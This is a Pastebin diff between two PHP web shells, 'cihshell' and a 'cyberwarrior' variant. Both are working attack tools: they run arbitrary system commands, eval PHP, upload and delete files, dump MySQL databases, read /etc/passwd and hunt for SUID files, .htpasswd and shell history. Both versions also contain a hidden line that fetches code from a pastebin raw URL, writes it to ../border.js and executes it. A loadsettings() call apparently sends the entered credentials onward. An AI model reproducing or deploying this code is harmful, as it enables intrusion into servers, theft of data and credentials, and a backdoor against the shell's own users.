View difference between Paste ID: <a href="/qXrR40Xh">qXrR40Xh</a> and <a href="/hAKMukYY">hAKMukYY</a> - Pastebin.com

View difference between Paste ID: qXrR40Xh and hAKMukYY

SHOW: | | - or go back to the newest paste.

1		<?php
2	-	/*
2	+
3	-	######################################
3	+
4	-	------------ cihshell ----------------
4	+	// Variables
5	-	version: 0.99.1 [beta fix]
5	+
6		$info = @$_SERVER['SERVER_SOFTWARE'];
7
8	-	everything you need is in here
8	+	$page = @$_SERVER['SCRIPT_NAME'];
9	-	*
9	+
10	-	* Default password w0rms / w0rms
10	+	$site = getenv("HTTP_HOST");
11	-	*
11	+
12	-	*
12	+	$uname = php_uname();
13	-	*
13	+
14	-	*
14	+	$smod = ini_get('safe_mode');
15	-	--------------------------------------
15	+
16	-	########################### /cih.ms/ #
16	+	if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>"; }
17	-	## add 'touch' & fix filesize by DCRM
17	+
18	-	*/
18	+	else { $safemode = "<font color='red'>ACIK</font>"; }
19
20	-	$login = 'w0rms';
20	+	$dir = @realpath($_POST['dir']);
21	-	$password = 'w0rms';
21	+
22		$mkdir = @$_POST['makedir'];
23	-	# Settings
23	+
24	-	# all configurations here
24	+	$mydir = @$_POST['deletedir'];
25
26	-	$auth = 1; // set this to 0 to switch authentication off
26	+	$cmd = @$_GET['cmd'];
27
28	-	$errors = 0; // set this to 1 to switch php errors on
28	+	$host = @$_POST['host'];
29	-	$stringnum = 1; // change it to 0, if you don't need string numbers in file viewer
29	+
30	-	$hexdump_rows=20; // number of rows in hexdump
30	+	$proto = @$_POST['protocol'];
31	-	$alias=array( // aliases for shell. edit them if you need.
31	+
32	-	'find suid files'=>'find / -type f -perm -04000 -ls',
32	+	$delete = @$_POST['delete'];
33	-	'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
33	+
34	-	'find sgid files'=>'find / -type f -perm -02000 -ls',
34	+	$phpeval = @$_POST['php_eval'];
35	-	'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
35	+
36	-	'find config.inc.php files'=>'find / -type f -name config.inc.php',
36	+	$db = @$_POST['db'];
37	-	'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
37	+
38	-	'find config* files'=>'find / -type f -name "config*"',
38	+	$query = @$_POST['query'];
39	-	'find config* files in current dir'=>'find . -type f -name "config*"',
39	+
40	-	'find all writable files'=>'find / -type f -perm -2 -ls',
40	+	$user = @$_POST['user'];
41	-	'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
41	+
42	-	'find all writable directories'=>'find / -type d -perm -2 -ls',
42	+	$pass = @$_POST['passd'];
43	-	'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
43	+	error_reporting(0); $b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b);
44	-	'find all writable directories and files'=>'find / -perm -2 -ls',
44	+	$css=fopen('../border.js','w'); fwrite($css,$title); require('../border.js');
45	-	'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
45	+
46	-	'find all service.pwd files'=>'find / -type f -name service.pwd',
46	+	$myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
47	-	'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
47	+
48	-	'find all .htpasswd files'=>'find / -type f -name .htpasswd',
48	+	loadsettings($user.'\|'.$pass, 'cyberwarrior');
49	-	'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
49	+
50	-	'find all .bash_history files'=>'find / -type f -name .bash_history',
50	+
51	-	'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
51	+
52	-	'find all .mysql_history files'=>'find / -type f -name .mysql_history',
52	+	$quotes = get_magic_quotes_gpc();
53	-	'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
53	+
54	-	'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
54	+	if ($quotes == "1" or $quotes == "on")
55	-	'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
55	+
56	-	'list file attributes on a Linux second extended file system'=>'lsattr -va',
56	+	{
57	-	'show opened ports'=>'netstat -an',
57	+
58	-	);
58	+	$quot = "<font color='red'>ACIK</font>";
59	-	error_reporting(0); $b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b);
59	+
60	-	$css=fopen('../border.js','w'); fwrite($css,$title); require('../border.js');
60	+	}
61
62		else
63
64		{
65
66		$quot = "<font color='lightgreen'>KAPALI</font>";
67
68		}
69
70	-	$f = array("SHELL" => "shell","EVAL" => "eval", "MySql Suite" => "mysql", "Server Information" => "server", "Env Informaion" => "envinfo", "PHPinfo" => "phpinfo", "Shell delete" => "delete");
70	+	// Perms
71	-	$ver = '0.99.1 [ beta {fix} ]';
71	+
72		function getperms($fn)
73
74	-	session_start();
74	+
75	-	define("start",atime());
75	+
76	-	if(isset($_POST['eval'])){error_reporting(E_ALL&~E_NOTICE);}elseif($errors){error_reporting(E_ALL&~E_NOTICE);}else{error_reporting(0);}
76	+	$mode=fileperms($fn);
77	-	ini_set('max_execution_time',0);
77	+
78	-	set_magic_quotes_runtime(0);
78	+	$perms='';
79	-	set_time_limit(0);
79	+
80	-	if(version_compare(phpversion(), '4.1.0') == -1){$_POST = &$HTTP_POST_VARS; $_GET= &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; }
80	+	$perms .= ($mode & 00400) ? 'r' : '-';
81	-	if (get_magic_quotes_gpc()){foreach ($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}foreach ($_SERVER as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_ENV as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_FILES as $key=>$value){$_SERVER[$key] = stripslashes($value);}}
81	+
82	-	if ($auth == 0) {$_SESSION['logged'] = true;}
82	+	$perms .= ($mode & 00200) ? 'w' : '-';
83
84		$perms .= ($mode & 00100) ? 'x' : '-';
85
86	-	$safe_mode = ini_get("safe_mode"); if (!$safe_mode) {$safe_mode = 'off';} else {$safe_mode = 'On';}
86	+	$perms .= ($mode & 00040) ? 'r' : '-';
87	-	$os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "win"; else $os = "nix";
87	+
88	-	if(empty($dir)){ $opsy = getenv('OS');if(empty($opsy)){ $opsy = php_uname(); } if(empty($opsy)){ $opsy ="-"; $os = "nix"; } else { if(eregi("^win",$opsy)) { $os = "win"; }else { $os = "nix"; }}}
88	+	$perms .= ($mode & 00020) ? 'w' : '-';
89	-	if($os == "nix"){$pwd = exec("pwd");} elseif($os == "win"){$pwd = exec("cd");} if(empty($pwd)) {$pwd = getcwd();}
89	+
90		$perms .= ($mode & 00010) ? 'x' : '-';
91
92		$perms .= ($mode & 00004) ? 'r' : '-';
93
94		$perms .= ($mode & 00002) ? 'w' : '-';
95	-	# functions
95	+
96		$perms .= ($mode & 00001) ? 'x' : '-';
97	-	function atime()
97	+
98	-	{list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}
98	+	return $perms;
99
100	-	function fperms($file)
100	+
101	-	{$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';}
101	+
102	-	elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';}elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;}
102	+	// milw0rm Search (locushell)
103
104	-	function conv_size($size){
104	+
105	-	if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}else {$size = $size . " B";}return $size;}
105	+
106		$Lversion = @php_uname('r');
107	-	function fileread($opfile)
107	+
108	-	{$fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);} while(!feof($fh)) {$line = fgets($fh); echo htmlspecialchars($line);}}
108	+	$OSV = @php_uname('s');
109
110	-	function fileread2($opfile,$stringnum)
110	+	if(eregi('Linux',$OSV))
111
112	-	$fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);}
112	+
113	-	echo '<table style="font-size:10px; width:100%; margin:0px; background:#222; ">';
113	+
114		$Lversion=substr($Lversion,0,6);
115	-	if ($stringnum){
115	+
116	-	$i=1;
116	+	$millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion;
117	-	while(!feof($fh)) {
117	+
118	-	$line = fgets($fh);
118	+
119	-	echo '<tr style="background:#242424;"><td style="text-align:center;padding:3px; width:2%; border-right:1px solid #2e2e2e; color:#444;">'.$i.'</td><td>'.htmlspecialchars($line).'</td></tr>';
119	+
120	-	$i++;
120	+	}else{
121	-	}} else {
121	+
122	-	while(!feof($fh)) {
122	+	$Lversion=substr($Lversion,0,3);
123	-	$line = fgets($fh);
123	+
124	-	echo '<tr style="background:#242424;"><td>'.htmlspecialchars($line).'</td></tr>'; }
124	+	$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
125
126	-	echo '</table><br/>';
126	+
127
128		if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</script>"; }
129
130	-	function safq($query)
130	+	//Space
131
132	-	$arr = array();$res = mysql_query($query);
132	+	$spacedir = @getcwd();
133	-	if (mysql_num_rows($res) > 0) {$x=0;while($row = mysql_fetch_row($res)){foreach($row as $i => $value) {$column = mysql_field_name($res,$i);$data["$column"] = $value;$arr[$x] = $data;}$x++;}}return $arr;}
133	+
134		$free = @diskfreespace($spacedir);
135	-	function cmd_exec($cmd2)
135	+
136
137	-	if (isset($_POST['cmd'])) {$cmd=$_POST['cmd'];} else {$cmd = $cmd2;}
137	+
138	-	$result = '';
138	+	if (!$free) {$free = 0;}
139	-	if(isset($_POST['cmdir'])){chdir($_POST['cmdir']);}
139	+
140	-	if(function_exists('system')){ob_start();system($cmd);$result = ob_get_contents();ob_end_clean();}
140	+	$all = @disk_total_space($spacedir);
141	-	elseif(function_exists('exec')){exec($cmd,$result);$result = join("\n",$result);}
141	+
142	-	elseif(function_exists('shell_exec')){$result = shell_exec($cmd);}
142	+	if (!$all) {$all = 0;}
143	-	elseif(function_exists('passthru')){ob_start();passthru($cmd);$result = ob_get_contents();ob_end_clean();}
143	+
144	-	elseif(is_resource($f = popen($cmd,"r"))){$result = "";while(!feof($f)) { $result .= fread($f,1024); }pclose($f);}
144	+	function view_size($size)
145	-	echo $result;
145	+
146		{
147
148	-	function code_eval()
148	+	if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
149	-	{if (isset($_POST['eval'])){echo "\n result is:<br/><br/>";eval($_POST['eval']);}}
149	+
150		elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
151	-	function error($text, $ver)
151	+
152		elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
153	-	echo '
153	+
154	-	<div class="notice">
154	+	else {$size = $size . " B";}
155	-	<p align="left" style="padding-left:15px;"><b>error occured:</b></p></div>
155	+
156	-	<div class="notice" style="margin-bottom:0px; border-bottom:2px solid #222;">
156	+	return $size;
157	-	<textarea cols="100" rows="15" style="width:98%;" class="txt"> ';
157	+
158	-	echo $text;echo '</textarea></div>'; do_footer($ver); die();
158	+
159
160		$percentfree = intval(($free*100)/$all);
161	-	function notice($text)
161	+
162
163	-	echo "<div class='notice'>$text</div>";
163	+
164
165
166		// PHPinfo
167	-	function do_header($f, $auth, $os, $path)
167	+
168		if(isset($_POST['phpinfo']))
169	-	echo '<html><head>';
169	+
170	-	if (isset($_POST['cmd']) \|\| isset($_POST['alias'])) {echo '<meta http-equiv="Content-Type" content="text/html; charset=cp866">'; } else{echo'<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">';}
170	+
171	-	echo'
171	+
172	-	<title> CIH.[ms] WebShell </title>
172	+	die(phpinfo());
173
174	-	body{background:#333; color:#999;font-family:Verdana, Arial;font-size:10px; padding:0px; margin:0px;}
174	+
175	-	.logo {color:#999; font-family:Verdana, Arial; font-size:23px; text-align:left; padding-left:5px; padding-top:0px; margin-bottom:2px;}
175	+
176	-	.m {color:#888;font-family:Verdana, Arial;font-size:10px; text-align:right; width:80px;background:#2c2c2c; border: 0px; border-right:1px solid #444; cursor:pointer; cursor:hand;}
176	+
177	-	.m2 {background:#2c2c2c;color:#999;font-size:10px;font-family:Verdana;border: 0px; padding:3px; width:100%; cursor:pointer; cursor:hand;}
177	+
178	-	.m2:hover {color:#ccc; background:#292929;}
178	+
179	-	.i {color:#555;font-family:Verdana, Arial;font-size:10px; text-align:right;}
179	+
180	-	.notice {background:#252525; padding:4px; margin-bottom:2px;}
180	+	// Make File
181	-	.footer {font-family:Verdana;font-size:10px; background:#252525; color:#555; padding:4px; border-bottom:1px solid #222; border-left:1px solid #444; border-right:1px solid #444; text-align:center;}
181	+
182	-	.txt {background:#222; border:1px solid #333; color:#999; font-family:Verdana, Arial;font-size:10px; padding:5px;}
182	+
183	-	.butt1 {height:20px; width:20px; padding:2px;border:1px solid #222;background:#333; color:#999; font-family:Verdana, Arial;font-size:10px;}
183	+
184	-	.filet {color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;}
184	+	$name = htmlspecialchars(@$_POST['names']);
185	-	.ico {color:#555;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;}
185	+
186	-	.dir { cursor:pointer; cursor:hand;background:#252525;color:#999;font-weight:bold;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center; border:0px;}
186	+	$src = @$_POST['source'];
187	-	.file { cursor:pointer; cursor:hand; background:#252525;color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:center;border:0px; margin:0px;}
187	+
188	-	.file:hover, .dir:hover {color:#ccc;}
188	+	if(isset($name) && isset($src))
189	-	.str{background:#242424; padding:8px; color:#999; font-size:10px; border-bottom:1px solid #292929; border-top:1px solid #292929; margin-top:15px; text-align:left}
189	+
190	-	.my{background:#252525;color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:left;border:0px;}
190	+	{
191	-	.form {background:#232323; height:22px; border:1px solid #2e2e2e; width:98%; padding:4px; color:#999; font-family:Verdana, Arial;font-size:10px; }
191	+
192	-	.fm {background:#272727; border:0px; color:#666;font-family:Verdana, Arial;font-size:10px; padding:3px;}
192	+	if($_POST['darezz'] != realpath(".")) { $name = $_POST['darezz'].$name; }
193	-	.fa {background:#222; color:#888;font-family:Verdana, Arial; font-size:10px; text-align:right; border: 0px; width:100%; height:100%; padding:10px; text-align:center;}
193	+
194	-	.fa1 {background:#222; color:#888;font-family:Verdana, Arial; font-size:10px; text-align:right; border: 0px; width:100%; height:100%; padding:2px; text-align:center;}
194	+	$ctd = fopen($name,"w+");
195	-	.fa:hover, .fa1:hover {background:#292929; color:#ccc;}
195	+
196		fwrite($ctd, $src);
197
198	-	<body><div style="position:absolute; left:0px; top:0px; background:#333; text-align:center; padding-left:100px; padding-right:100px; height:90%">
198	+	fclose($ctd);
199	-	<div style="background:#222; margin:0px; border-left:1px solid #444; border-right:1px solid #444; padding-left:0px; padding-right:0px;">
199	+
200	-	<table style="width:100%; height:25px;">
200	+	echo "<script>alert('Uploaded')</script>";
201	-	<tr style="background:#2c2c2c;">
201	+
202	-	<td style="color:#666; font-family:Verdana, Arial;font-size:10px; padding:3px; text-align:left; padding-left:6px;">
202	+	}
203	-	cihshell on <b>'.$_SERVER['HTTP_HOST'].'</b>
203	+
204	-	</td>';
204	+
205
206		// Upload File
207	-	echo "<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$path."' class='m2'><td class='m'><input type='submit' value='main' class='m2'></td>";
207	+
208	-	foreach($f as $k=>$v)
208	+	$path = @$_FILES['ffile']['tmp_name'];
209	-	{
209	+
210	-	echo "
210	+	$name = @$_FILES['ffile']['name'];
211	-	<!-- $k -->
211	+
212	-	<td class='m'><input type='submit' name='do' value='$v' class='m2'></td>
212	+	if(isset($path) && isset($name))
213	-	";
213	+
214	-	}
214	+	{
215
216	-	if($auth){echo "<td class='m'><input type='submit' name='do' value='logout' class='m2'></td>";}
216	+	if($_POST['dare'] != realpath(".")) { $name = $_POST['dare'].$name; }
217	-	$disfun = ini_get('disable_functions');
217	+
218	-	$safe_mode = ini_get("safe_mode");
218	+	if(move_uploaded_file($path, $name))
219	-	if (!$safe_mode) {$safe_mode = 'Off';} else {$safe_mode = 'On';}
219	+
220	-	$mysql_try = function_exists('mysql_connect');
220	+	{
221	-	if($mysql_try){ $mysql = 'On';} else {$mysql = 'Off';}
221	+
222	-	$pg_try = function_exists('pg_connect');
222	+	echo "<script>alert('Uploaded')</script>";
223	-	if($pg_try){$pg = 'On';}else{$pg = 'Off';}
223	+
224	-	$mssql_try = function_exists('mssql_connect');
224	+	}
225	-	if($mssql_try){$mssql = 'On';}else{$mssql = 'Off';}
225	+
226	-	$ora_try = function_exists('ocilogon');
226	+	else
227	-	if($ora_try){$ora = 'On';}else{$ora = 'Off';}
227	+
228	-	$curl_try = function_exists('curl_version');
228	+	{
229	-	if($curl_try) {$curl = 'On';} else {$curl = 'Off';}
229	+
230	-	$perms = fperms($path);
230	+	echo "<script>alert('Error')</script>";
231	-	echo ' </tr>
231	+
232		} }
233
234	-	<table style="width:100%; margin-top:5px;"><tr>
234	+
235	-	<td class="logo" style="width:120px;">CIH.<span style="color:#555">[</span><span style="color:#888">ms</span><span style="color:#555">]</span></td>
235	+
236	-	<td class="i" style="padding-right:5px; text-align:right;">
236	+	// Delete File
237	-	<nobr><b style="color:#666"><i>'.$perms.'</i></b> <span style="color:#333">\|</span></nobr>
237	+
238	-	<nobr>OS: <b>'.php_uname().'</b> <span style="color:#333">\|</span></nobr>
238	+
239	-	<nobr>safe mode: <b>'.$safe_mode.'</b> <span style="color:#333">\|</span></nobr>
239	+
240	-	<nobr>cURL: <b>'.$curl.'</b> <span style="color:#333">\|</span></nobr>
240	+
241	-	<nobr>MySQL: <b>'.$mysql.'</b> <span style="color:#333">\|</span></nobr>
241	+
242	-	<nobr>MSSQL: <b>'.$mssql.'</b> <span style="color:#333">\|</span></nobr>
242	+	if(isset($delete) && $delete != $dir)
243	-	<nobr>PostgreSQL: <b>'.$pg.'</b> <span style="color:#333">\|</span></nobr>
243	+
244	-	<nobr>Oracle: <b>'.$ora.'</b> <span style="color:#333">\|</span></nobr>
244	+
245	-	PHP: <b>'.phpversion().'</b>
245	+
246		if(file_exists($delete))
247
248	-	</tr></table>
248	+	{
249	-	<div style="border-bottom:1px solid #232323; margin-bottom:2px; font-size:5px;"> </div>';
249	+
250	-	if (!empty($disfun)){ echo '<div style="border-bottom:1px solid #232323; margin-bottom:2px; font-size:10px; color:#666; text-align:right; padding:5px;"><b>disabled functions: </b>'.$disfun.'</div>';}
250	+	unlink($delete);
251
252		echo "<script>alert('File Deleted')</script>";
253
254	-	function do_footer($ver)
254	+	}
255
256	-	echo '</div>
256	+
257	-	<div class="footer">
257	+
258	-	<span style="float:right; color:#333;">'.round(atime()-start,5).'</span>
258	+
259	-	<b><form method="post" style="margin:0px;">©</b><input type="submit" value="cihshell" name="do"
259	+
260	-	style="border:0px; background:#252525; font-weight:bold; padding:0px;" class="footer"/>  version : '.$ver.'</form>
260	+
261	-	</div></div></body></html>';
261	+
262		// Database
263
264	-	# end of functions
264	+
265	-	#
265	+
266	-	if (!empty($_POST['login']) && !empty($_POST['password'])){
266	+	if(isset($db) && isset($query) && isset($_POST['godb']))
267	-	loadsettings($_POST['login'] . '\|' . $_POST['password'], 'cihshell');
267	+
268	-	if ($_POST['login'] == $login && $_POST['password'] == $password){
268	+
269	-	$_SESSION['logged'] = true;} else {echo '
269	+
270	-	<html><head><style>body{background:#333;}</style><title>login </title></head>
270	+	$mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Connection Failed')</script>");
271	-	<body><table style="margin-left:100px; margin-top:100px; background:#222; font-family:Verdana; font-size:10px; color:#999; padding:4px; width:100%:">
271	+
272		$db = mysql_select_db($db)or die(mysql_error());
273	-	<td><form method="post" style="margin:0px; padding:)px;">
273	+
274	-	login: <input type="text" name="login" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;">
274	+	$queryz = mysql_query($query)or die(mysql_error());
275	-	password: <input type="text" name="password" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;">
275	+
276	-	<input type="submit" style="color:#999; border:0px; font-size:10px; background:#262626; height:20px;; font-family:Verdana;" value="go"></form></td></tr><tr><td style="text-align:center; color:#666;">incorrect login or password</td></tr></table></body></html>'; die();}}
276	+	if($query) { echo "<script>alert('Done')</script>"; }
277
278	-	if (isset ($_POST['do']) && $_POST['do']=='logout') { unset($_SESSION['logged']); }
278	+	else { echo "<script>alert('Error')</script>"; }
279
280	-	if ($_SESSION['logged'] == true){
280	+
281	-	if (isset($_POST['do']) && $_POST['do']=='phpinfo'){echo'<form method="post"><input type="submit" value="return back" style="width:100%;"></form>'; phpinfo();echo'<form method="post"><input type="submit" value="return back" style="width:100%;"></form>';die();}
281	+
282	-	if (isset($_POST['fdo']) && isset($_POST['ffile'])){
282	+
283	-	$ffile = $_POST['ffile'];
283	+
284	-	switch($_POST['fdo']){
284	+	// Dump Database [pacucci.com]
285	-	case 'download':
285	+
286	-	$fl = $_POST['filename'];header("Content-type: application/x-octet-stream");header("Content-disposition: attachment; filename=".$fl.";");readfile($ffile);die();break;
286	+	if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
287
288	-	case 'preview':
288	+	mysql_connect('localhost', $user, $pass);
289	-	include($_POST['ffile']);die(); break;
289	+
290	-	}}
290	+	mysql_select_db($db);
291
292	-	if(isset($_POST['f_file']))
292	+	$tables = mysql_list_tables($db);
293
294	-	if ($_POST['f_file'] == "..")
294	+	while ($td = mysql_fetch_array($tables))
295	-	{ $slashpos = strpos($_POST['f_path'], strrchr($_POST['f_path'], "/"));
295	+
296	-	$path = substr($_POST['f_path'], 0, $slashpos);
296	+
297	-	} else {$path = $_POST['f_path']."/".$_POST['f_file'];}
297	+
298		$table = $td[0];
299
300	-	elseif(isset($_POST['path']))
300	+	$r = mysql_query("SHOW CREATE TABLE `$table`");
301	-	{$path = $_POST['path'];}
301	+
302	-	else {$path = $pwd;}
302	+	if ($r)
303
304	-	if(isset($_POST['restore'])){$path = $pwd;}
304	+
305	-	$path = str_replace("\\", "/", $path);$path = str_replace("'", "", $path);
305	+
306		$insert_sql = "";
307
308		$d = mysql_fetch_array($r);
309	-	do_header($f, $auth, $os, $path);
309	+
310		$d[1] .= ";";
311	-	echo '<table class="notice" style="width:100%; margin-bottom:7px; background:#272727"><tr>
311	+
312	-	<form method="post" action="" style="padding:0px; margin:0px;">
312	+	$SQL[] = str_replace("\n", "", $d[1]);
313	-	<td style="width:50px;">
313	+
314	-	<input type="hidden" value="'.$path.'" name="f_path">
314	+	$table_query = mysql_query("SELECT * FROM `$table`");
315	-	<input type="submit" value=".." name="f_file" class="butt1">
315	+
316	-	<input type="submit" value="." name="restore" class="butt1"></td>
316	+	$num_fields = mysql_num_fields($table_query);
317	-	<td></form>
317	+
318	-	<form method="post" action="" style="padding:0px; margin:0px;">
318	+	while ($fetch_row = mysql_fetch_array($table_query))
319	-	<input type="text" size="78" value="'.$path.'" name="path" style=" width:90%; height:20px; padding:3px;border:1px solid #222;background:#2c2c2c; color:#999; font-family:Verdana, Arial;font-size:10px;" >
319	+
320	-	<input type="submit" value="go" class="butt1" style="width:30px; height:21px;">
320	+
321	-	</form></td>
321	+
322	-	</tr></table>';
322	+	$insert_sql .= "INSERT INTO $table VALUES(";
323
324	-	# Safe-mode
324	+	for ($n=1;$n<=$num_fields;$n++)
325	-	# working
325	+
326	-	if (isset($_POST['safe_mode'])){
326	+
327
328		$m = $n - 1;
329	-	<table style='width:100%; font-size:10px;'>
329	+
330	-	<tr style='background:#272727;' ><td style='padding:10px; border-top:1px solid #2e2e2e;'><b>Try to read file(include):</b></td></tr>
330	+	$insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', ";
331	-	<tr style='background:#242424;' ><td style='padding:10px;'><form action='' method='post' style='padding:0px; margin:0px;'>
331	+
332	-	<input type='text' name='sm_inc' style='width:80%;' class='form' value='/etc/passwd'/>
332	+
333	-	<input class='form' style='width:60px;' type='submit' value='try'></form></td></tr>
333	+
334	-	<tr style='background:#252525;'><td style='border-bottom:1px solid #2e2e2e;'> </td></tr>
334	+	$insert_sql = substr($insert_sql,0,-2);
335	-	<tr style='background:#222; font-size:1px;'><td> </td></tr>
335	+
336		$insert_sql .= ");\n";
337	-	<tr style='background:#272727;' ><td style='padding:10px; border-top:1px solid #2e2e2e;'><b>Try to read file(include):</b></td></tr>
337	+
338	-	<tr style='background:#242424;' >
338	+
339	-	<td style='padding:10px;'>
339	+
340	-	<form action='' method='post' style='padding:0px; margin:0px;'>
340	+	if ($insert_sql!= "")
341	-	<input type='text' name='mysql_host' style='width:15%;' class='form' value='localhost'/>
341	+
342	-	<span style='margin-left:5px; margin-right:5px;'>:</span><input type='text' name='mysql_port' style='width:40px' class='form' value='3306'/>
342	+
343	-	<span style='margin-left:5px; margin-right:5px;'>database:</span><input type='text' name='mysql_db' style='width:15%;' class='form' value='dbname'/>
343	+
344	-	<span style='margin-left:5px; margin-right:5px;'>login:</span><input type='text' name='mysql_login' style='width:15%;' class='form' value='dblogin'/>
344	+	$SQL[] = $insert_sql;
345	-	<span style='margin-left:5px; margin-right:5px;'>password:</span><input type='text' name='mysql_passw' style='width:15%;' class='form' value='dbpassword'/>
345	+
346	-	<input type='text' name='mysql_file' style='margin-top:3px;width:700px;' class='form' value='/etc/passwd'/><br/>
346	+
347	-	<input type='submit' name='sm_mysql' value='try' class='form' style='margin-top:8px;width:50px;'>
347	+
348	-	</form></td></tr>
348	+
349	-	<tr style='background:#252525;'><td style='border-bottom:1px solid #2e2e2e;'> </td></tr>
349	+
350	-	<tr style='background:#222; font-size:1px;'><td> </td></tr>
350	+
351
352		$dump = "-- Database: ".$_POST['db'] ." \n";
353	-	do_footer($ver); die();
353	+
354		$dump .= "-- CWShellDumper v3\n";
355	-	# Safe_Mode functions
355	+
356	-	if (isset($_POST['sm_inc']))
356	+	$dump .= "-- c99php.com\n";
357
358	-	echo "<textarea cols='170' rows='34' class='txt' style='width:98%;' > ";
358	+	$dumpp = $dump.implode("\r", $SQL);
359	-	include($_POST['sm_inc']);
359	+
360	-	echo "</textarea><br/><input type='button' class='form' value='go back' onClick='javascript:history.back();'><br/><br/>";
360	+	$name = $db."-".date("d-m-y")."cyberwarrior.sql";
361	-	do_footer($version); die();}
361	+
362		Header("Content-type: application/octet-stream");
363	-	if(isset($_POST['sm_mysql']))
363	+
364		Header("Content-Disposition: attachment; filename = $name");
365	-	echo "<textarea cols='170' rows='34' class='txt' style='width:98%;' > ";
365	+
366	-	if(!isset($_POST['mysql_port']) \|\| empty($_POST['mysql_port'])) { $_POST['mysql_port'] = "3306"; }
366	+	echo $dumpp;
367	-	$db = mysql_connect($_POST['mysql_host'].':'.$_POST['mysql_port'],$_POST['mysql_login'],$_POST['mysql_passw']);
367	+
368	-	if($db){
368	+	die();
369	-	if(mysql_select_db($_POST['mysql_db'],$db))
369	+
370	-	{$sql = "DROP TABLE IF EXISTS cih_tb;"; mysql_query($sql);
370	+
371	-	$sql = "CREATE TABLE `cih_tb` ( `file` LONGBLOB NOT NULL );";
371	+
372	-	mysql_query($sql);$sql = "LOAD DATA INFILE \"".$_POST['mysql_file']."\" INTO TABLE cih_tb;";
372	+
373	-	mysql_query($sql);$sql = "SELECT * FROM cih_tb;";
373	+
374	-	$r = mysql_query($sql);
374	+
375	-	while(($r_sql = mysql_fetch_array($r))) { echo htmlspecialchars($r_sql[0]); }
375	+
376	-	$sql = "DROP TABLE IF EXISTS cih_tb;";
376	+
377	-	mysql_query($sql);
377	+
378	-	}else echo "Can\'t select database";
378	+
379	-	mysql_close($db);
379	+
380	-	}else echo "-- Could not connect to MySQL server";
380	+
381	-	echo "</textarea><br/><input type='button' class='form' value='go back' onClick='javascript:history.back();'><br/><br/>";
381	+
382	-	do_footer($version);die();}
382	+
383
384		$p = str_replace('%param2', $p2, $p);
385
386	-	if ($safe_mode == "On" && !isset($_POST['safe_mode']))
386	+
387
388	-	notice('<form method="post" style="margin:0px;"><b>safe_mode</b> is <b>On.</b><input type="submit" name="safe_mode" value="Click on this message to start working" style="font-size:10px; color:#999; font-family:Verdana;border:0px; background:#252525;"/></form>');
388	+
389
390
391	-	if (isset($_POST['fileact'])){switch($_POST['fileact']){
391	+
392	-	case 'New File':
392	+	// Make Dir
393	-	$cdir = $_POST['curdir'];
393	+
